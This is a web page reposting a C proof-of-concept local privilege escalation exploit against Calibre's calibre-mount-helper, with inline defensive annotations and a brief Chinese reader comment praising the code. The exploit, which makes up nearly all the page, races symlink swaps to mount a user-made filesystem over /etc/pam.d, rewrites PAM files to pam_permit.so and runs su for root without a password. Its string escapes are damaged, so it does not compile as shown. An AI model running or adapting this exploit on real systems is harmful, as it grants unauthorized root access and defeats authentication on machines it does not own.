Calibre E-Book Reader Local Root 3

#include <stdio.h>
#include <sys/inotify.h>
#include <unistd.h>
#include <stdlib.h>
#include <signal.h>

/*
 * Proof-of-concept listing: local privilege escalation through Calibre's
 * calibre-mount-helper, reproduced on this page.
 *
 * What the code shows: an unprivileged user invokes the helper with a
 * caller-chosen device path and a caller-chosen mount point, while sibling
 * processes keep swapping those names between a user-owned object and a
 * symlink to a privileged one. This is a check-then-use (TOCTOU) race on
 * path names. The intended end state is a user-prepared filesystem mounted
 * over /etc/pam.d, after which `su` is run.
 *
 * Reviewer notes (defensive):
 *  - Root cause class: a privileged helper (presumably setuid root; confirm
 *    on the installed binary) that validates a path by name and later
 *    re-resolves the same name. A helper of this kind should resolve each
 *    path once, refuse symlinks (O_NOFOLLOW), validate the opened descriptor
 *    with fstat() rather than the name, and accept mount points only inside
 *    a fixed root-owned directory, or hand mounting to the system's mount
 *    service instead of shipping its own setuid binary.
 *  - Exposure check: look for the helper among setuid files
 *    (find / -perm -4000 -type f) and remove the setuid bit or the binary
 *    where it is not needed; check the vendor's advisories for the release
 *    that addresses it.
 *  - Detection: bursts of failing helper invocations from one user, rapid
 *    rename/symlink churn on /dev/shm/overlay, any entry in /proc/mounts
 *    whose mount point is /etc/pam.d, and pam_permit.so appearing in auth
 *    stacks that previously used pam_unix.so or pam_deny.so.
 *  - NOTE(review): the listing lost characters in extraction (string escapes
 *    and inner quotes), so it is not compilable as shown; treat it as
 *    illustrative.
 */
int main(int argc, char **argv)
{
    printf("########################################################n");
    printf("#               .80 Calibrer Assault Mount             #n");
    printf("#                         by zx2c4                     #n");
    printf("########################################################nn");

    /* Stage 0: remove leftovers of an earlier run and ask the helper to
     * clean up a previous mount on /media/staging/. */
    printf("[+] Cleaning up old cruft.n");
    unlink("/dev/shm/overlay");
    system("calibre-mount-helper cleanup /dev/ram0 /media/staging/");

    /* Stage 1: build a user-owned NTFS image under /dev/shm. The image is
     * created and formatted entirely as the calling user; nothing here needs
     * privilege. Defensive relevance: the filesystem content that is mounted
     * later is fully attacker-controlled. */
    printf("[+] Creating overlay container.n");
    system("dd if=/dev/zero of=/dev/shm/overlay count=25600");
    system("/usr/sbin/mkfs.ntfs /dev/shm/overlay");

    /* Stage 2: first race. The parent retries the helper's mount command
     * while the child flips /dev/shm/overlay between the image file and a
     * symlink to /dev/ram0. */
    printf("[+] Mounting staging using race condition toggler...n");
    int childpid = fork();
    if (childpid) {
        int ret;
        /* system() returns a wait status; on Linux 256 and 8192 correspond to
         * exit codes 1 and 32 (status >> 8). The loop retries while the
         * helper exits with either code and stops on any other result. A
         * tight loop of failing helper runs is a usable detection signal. */
        while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /media/staging/ 2>&1")) == 256 || ret == 8192);
        kill(childpid, SIGKILL);
    } else {
        /* Child: endlessly alternates what the name /dev/shm/overlay refers
         * to. Return values are not checked. */
        while (1) {
            rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
            symlink("/dev/ram0", "/dev/shm/overlay");
            unlink("/dev/shm/overlay");
            rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
        }
        return 0;
    }

    /* Stage 3: copy the PAM configuration into the mounted image and rewrite
     * the copies so the listed modules are replaced by pam_permit.so. The
     * files under /etc/pam.d on disk are not edited here; only the copies
     * under /media/staging/ are. For incident response this means the
     * original files should still be present underneath once the overlay is
     * unmounted. Verify rather than assume. */
    printf("[+] Preparing overlay with /etc/pam.d modification:n");
    system("cp -v /etc/pam.d/* /media/staging/");
    system("sed -i "s/pam_deny.so/pam_permit.so/g" /media/staging/common-auth");
    system("sed -i "s/pam_cracklib.so.*/pam_permit.so/g" /media/staging/system-auth");
    system("sed -i "s/pam_unix.so.*/pam_permit.so/g" /media/staging/system-auth");

    /* Stage 4: second race, now with /etc/pam.d/ as the mount point. Three
     * processes run: the parent retrying the helper, one child repeating the
     * device-path swap from stage 2, and one child swapping a directory under
     * /media/staging/ for a symlink to /etc/pam.d. */
    printf("[+] Mounting overlay over /etc/pam.d using race condition toggler and inotify...n");
    childpid = fork();
    if (childpid) {
        int childpid2 = fork();
        if (childpid2) {
            int ret;
            /* Same retry condition as in stage 2. */
            while ((ret = system("calibre-mount-helper mount /dev/shm/overlay /etc/pam.d/ 2>&1")) == 256 || ret == 8192);
            kill(childpid, SIGKILL);
            kill(childpid2, SIGKILL);
        } else {
            /* Second child: watches /media/staging/fake for IN_CREATE and
             * then replaces that directory with a symlink to /etc/pam.d. */
            while (1) {
                int fd;
                fd = inotify_init();
                unlink("/media/staging/fake");
                mkdir("/media/staging/fake");
                inotify_add_watch(fd, "/media/staging/fake", IN_CREATE);
                /* NOTE(review): read() is given a null buffer and length 0;
                 * whether this waits for an event is not established by the
                 * listing. Confirm before relying on the timing described
                 * in the banner. */
                read(fd, 0, 0);
                rename("/media/staging/fake", "/media/staging/tmp");
                symlink("/etc/pam.d", "/media/staging/fake");
                rmdir("/media/staging/tmp");
                close(fd);
            }
        }
    } else {
        /* First child: the same device-path swap loop as in stage 2. */
        while (1) {
            rename("/dev/shm/overlay", "/dev/shm/overlay-holder");
            symlink("/dev/ram0", "/dev/shm/overlay");
            unlink("/dev/shm/overlay");
            rename("/dev/shm/overlay-holder", "/dev/shm/overlay");
        }
        return 0;
    }

    /* Stage 5: with the rewritten PAM files mounted over /etc/pam.d, the
     * banner states that `su` accepts any password. Defensive check: a
     * filesystem mounted on /etc/pam.d, or pam_permit.so in the auth stack,
     * should be treated as a compromise indicator. */
    printf("[+] Asking for root. When prompted for a password, type anything and press enter.n");
    system("su");

    return 0;
}


Calibre E-Book Reader Local Root 3:目前有1 条留言

  1. 沙发
    Leader:

    这个C语言有点强大了 顶起来~~~

    2012-03-27 15:41
